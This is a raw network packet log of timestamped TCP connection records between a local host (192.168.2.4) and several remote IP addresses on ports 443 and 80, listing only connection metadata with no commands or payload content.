                                                                                                                      Dec 3, 2024 08:54:32.602716923 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.602725983 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.602767944 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.610588074 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.625224113 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.625324965 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.625346899 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.625390053 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.633153915 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.633162975 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.633205891 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.647875071 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.647937059 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.647949934 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.648005962 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.662902117 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.662909031 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.662972927 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.677860022 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.677865982 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.677927971 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.685493946 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.685503006 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.685558081 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.685590982 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.685617924 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.685653925 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.685683012 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.685898066 CET49761443192.168.2.4104.17.25.14
                                                                                                                      Dec 3, 2024 08:54:32.685914040 CET44349761104.17.25.14192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.699376106 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.699493885 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:54:32.699810028 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:54:32.724232912 CET44349762152.199.21.175192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.724400997 CET44349762152.199.21.175192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.724467039 CET49762443192.168.2.4152.199.21.175
                                                                                                                      Dec 3, 2024 08:54:32.724483967 CET44349762152.199.21.175192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.724499941 CET44349762152.199.21.175192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.724545956 CET49762443192.168.2.4152.199.21.175
                                                                                                                      Dec 3, 2024 08:54:32.725387096 CET49762443192.168.2.4152.199.21.175
                                                                                                                      Dec 3, 2024 08:54:32.725400925 CET44349762152.199.21.175192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:32.819724083 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.280265093 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.280690908 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.280719995 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.281809092 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.281887054 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.283128977 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.283190966 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.283433914 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.283442020 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.336275101 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.336575031 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.336599112 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.337388992 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.337512970 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.337588072 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.337927103 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.337981939 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.384284019 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.384306908 CET4434976613.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.431170940 CET49766443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:33.904200077 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:33.946765900 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:54:34.214791059 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.259270906 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.263660908 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.263669968 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.263696909 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.263719082 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.263732910 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.263758898 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.263776064 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.263817072 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.264085054 CET49765443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.264096022 CET4434976513.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.408991098 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.409027100 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:34.409111023 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.409343004 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:34.409356117 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.177817106 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.211998940 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.212021112 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.213263988 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.213344097 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.214703083 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.214793921 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.214885950 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.259334087 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.259512901 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.259531975 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.308878899 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.826997995 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848639011 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848649979 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848706007 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848727942 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848843098 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.848843098 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.848845959 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:36.848891020 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.849276066 CET49769443192.168.2.413.227.8.72
                                                                                                                      Dec 3, 2024 08:54:36.849292994 CET4434976913.227.8.72192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:38.588805914 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:38.588839054 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:38.588912964 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:38.589373112 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:38.589381933 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.000705957 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.001106024 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.001122952 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.002194881 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.002331018 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.003438950 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.003510952 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.003745079 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.003752947 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.045324087 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.514480114 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.514559984 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.514619112 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.515324116 CET49770443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.515340090 CET44349770149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.516408920 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.516449928 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:40.516514063 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.516922951 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:40.516941071 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:41.925496101 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:41.925863981 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:41.925884962 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:41.926249027 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:41.926615953 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:41.926690102 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:41.926784992 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:41.967334032 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:42.548839092 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:42.548955917 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:42.549009085 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:42.550363064 CET49771443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:42.550376892 CET44349771149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:42.693999052 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:42.694037914 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:42.694168091 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:42.694442987 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:42.694453001 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.169358015 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.203752041 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.203768969 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.204927921 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.205012083 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.207040071 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.207113028 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.210335970 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.210345030 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.259622097 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.698232889 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.698333025 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:44.698380947 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.699378014 CET49772443192.168.2.4149.154.167.220
                                                                                                                      Dec 3, 2024 08:54:44.699400902 CET44349772149.154.167.220192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:47.100303888 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:47.100331068 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:47.100425959 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:47.100928068 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:47.100940943 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.465503931 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:48.465562105 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.465672970 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:48.465993881 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:48.466012001 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.895620108 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.895692110 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:48.900298119 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:48.900309086 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.900561094 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:48.909759998 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:48.955334902 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.599469900 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.599493980 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.599509954 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.599594116 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.599606037 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.599654913 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639566898 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.639609098 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.639640093 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639646053 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.639669895 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.639698029 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639707088 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639811993 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639816999 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:49.639838934 CET49773443192.168.2.4172.202.163.200
                                                                                                                      Dec 3, 2024 08:54:49.639842033 CET44349773172.202.163.200192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.188807964 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.188901901 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.190645933 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.190654993 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.190880060 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.200531006 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.247328043 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.666858912 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.666877985 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.666893959 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.666971922 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.666990995 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.667041063 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.847182989 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.847209930 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.847290039 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.847305059 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.847352028 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.893595934 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.893620014 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.893691063 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:50.893698931 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:50.893745899 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.012686968 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.012712955 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.012824059 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.012836933 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.012885094 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.041951895 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.041992903 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.042067051 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.042073965 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.042129040 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.067840099 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.067861080 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.067966938 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.067976952 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.068018913 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.085082054 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.085093975 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.085208893 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.085217953 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.085269928 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.202894926 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.202951908 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.203046083 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.203064919 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.203099966 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.203123093 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.217092037 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.217113018 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.217235088 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.217242956 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.217300892 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.232496977 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.232512951 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.232609034 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.232616901 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.232665062 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.247414112 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.247431040 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.247530937 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.247543097 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.247581005 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.257966995 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.257982016 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.258155107 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.258162975 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.258212090 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.270350933 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.270366907 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.270454884 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.270462990 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.270504951 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.308249950 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.308340073 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.308470011 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.308470011 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.321376085 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.321399927 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.321409941 CET49774443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.321417093 CET4434977413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.437747002 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.437793016 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.437879086 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.439160109 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.439275026 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.439342976 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.439460039 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.439476013 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.440642118 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.440677881 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.440741062 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.440800905 CET49776443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.440817118 CET4434977613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.440916061 CET49777443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.440927982 CET4434977713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.441791058 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.441801071 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.441857100 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.442377090 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.442387104 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.442437887 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.442555904 CET49779443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.442565918 CET4434977913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:51.442647934 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:51.442656994 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.220789909 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.221378088 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.221400023 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.221940041 CET49775443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.221946001 CET4434977513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.223614931 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.223884106 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.223908901 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.224258900 CET49778443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:54:53.224263906 CET4434977813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:54:53.286746979 CET4434977613.107.246.63192.168.2.4
